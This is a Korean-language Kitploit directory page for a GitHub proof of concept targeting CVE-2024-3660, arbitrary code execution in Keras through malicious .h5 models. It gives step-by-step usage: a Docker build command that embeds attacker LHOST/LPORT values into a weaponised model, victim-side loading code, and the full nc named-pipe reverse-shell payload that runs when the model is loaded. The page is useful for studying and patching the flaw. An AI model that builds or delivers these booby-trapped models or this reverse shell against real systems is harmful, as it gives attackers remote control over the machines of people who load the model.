Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-3660-PoC — CVE-2024-3660에 대한 PoC. Keras의 임의 코드 실행. | Kitploit
도구/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
Vulnerability AnalysisExploitationPenetration TestingPayload DevelopmentAI SecurityBinary Exploitation
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

CVE-2024-3660에 대한 PoC. Keras의 임의 코드 실행.

저장소 보기
411년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-3660 – 악성 모델을 통한 TensorFlow Keras 임의 코드 실행

개요

CVE-2024-3660은 TensorFlow의 Keras 프레임워크에서 2.13 미만 버전에 영향을 주는 임의 코드 실행 취약점입니다.
공격자는 Lambda 레이어 등을 통해 모델 내부에 Python 코드를 삽입할 수 있으며, 이 코드는 모델이 로드될 때 자동으로 실행됩니다.

악성 .h5 모델 파일이 취약한 환경에서 로드되면, 로드 프로세스와 동일한 권한으로 임의 명령이 실행됩니다.


영향을 받는 버전

  • TensorFlow의 Keras < 2.13.0
  • 다음을 통해 로드되는 Keras 모델:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

또는 safe_mode가 기본적으로 활성화되지 않은 이전 TensorFlow 버전에서.

PoC 설명

이 PoC는 Docker 기반 빌드를 사용하여 리버스 셸 페이로드가 포함된 악성 hack.h5 모델을 생성합니다. 모델이 취약한 TensorFlow 버전에서 로드되면 공격자의 머신으로 다시 연결됩니다.

사용법

1. 악성 모델 빌드 및 추출

root@kitploit:~
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. 악성 모델 로드 (피해자 측)

  • 취약한 TensorFlow 환경(< 2.13)에서:
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

페이로드

  • 포함된 페이로드는 리버스 셸을 위해 nc를 사용합니다:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

참고 자료

NVD CMU Oligo Secuirty

도구 다운로드